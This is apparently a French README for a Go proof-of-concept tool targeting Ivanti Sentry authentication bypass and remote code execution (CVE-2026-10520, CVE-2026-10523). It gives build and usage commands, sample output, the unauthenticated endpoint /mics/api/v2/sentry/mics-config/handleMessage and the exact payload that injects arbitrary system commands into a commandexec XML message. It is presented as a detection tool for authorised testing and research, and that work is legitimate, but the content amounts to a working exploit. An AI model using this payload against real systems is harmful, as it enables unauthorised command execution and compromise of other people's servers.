
Outil de détection de preuve de concept pour les vulnérabilités de contournement d'authentification et d'exécution de code à distance Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Envoie des requêtes API malveillantes pour exécuter des commandes système et valider les déploiements vulnérables.
Un outil de détection de preuve de concept complet pour tester les vulnérabilités Ivanti Sentry liées au contournement d'authentification et à l'exécution de code à distance. Cet outil identifie les systèmes vulnérables à CVE-2026-10520 et CVE-2026-10523.
Ce projet est conçu pour détecter et valider si une instance Ivanti Sentry est vulnérable à des failles critiques de contournement d'authentification et d'exécution de code à distance. L'outil envoie des messages spécialement conçus via le point de terminaison API Ivanti Sentry pour exécuter des commandes système et extraire les résultats, permettant aux chercheurs en sécurité et aux testeurs d'intrusion d'identifier les déploiements vulnérables.
Vulnérabilité de contournement d'authentification dans Ivanti Sentry qui permet un accès non authentifié à des points de terminaison API restreints.
Vulnérabilité d'exécution de code à distance dans Ivanti Sentry qui permet l'exécution de commandes système arbitraires via l'API de messagerie lorsqu'elle est combinée au contournement d'authentification.
Clonez le dépôt et accédez au répertoire du projet :
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry
Initialisez le module et installez les dépendances
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy
Compilez l'exécutable :
go build -o tot_poc tot_poc.go

L'outil nécessite deux paramètres obligatoires : l'URL cible et la commande à exécuter.

Exécutez une commande simple sur la cible :
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
-url (obligatoire) : URL de base cible incluant le protocole (ex. https://127.0.0.1:8443)-cmd (obligatoire) : Commande à exécuter pour la détection de vulnérabilité (ex. "uname -a", "id", "whoami")-p ou -proxy (optionnel) : Adresse et port du proxy pour router le trafic (ex. 127.0.0.1:8080)
Détectez la vulnérabilité avec une commande simple d'informations système :
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
Exécutez avec une configuration proxy :
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
Exécutez une commande pour extraire les informations système :
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
L'outil affichera :
Cible : https://192.168.1.100:8443
Commande : uname -a
[+] Envoi de la vérification d'exécution de commande à : https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] La cible semble vulnérable.
Sortie de la commande :
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
Cible : https://192.168.1.100:8443
Commande : uname -a
[+] Envoi de la vérification d'exécution de commande à : https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] La cible ne semble pas vulnérable.
L'outil exploite le point de terminaison /mics/api/v2/sentry/mics-config/handleMessage qui est accessible sans authentification. La charge utile est construite comme suit :
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
La réponse contient la sortie de la commande au format XML dans une balise success.
Cet outil est fourni à des fins de tests de sécurité autorisés et de recherche uniquement. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent des autorisations appropriées avant de tester tout système. L'accès non autorisé aux systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
GhostGTR666 - Gagaltotal666
Ce projet est fourni tel quel à des fins de recherche en sécurité et éducatives.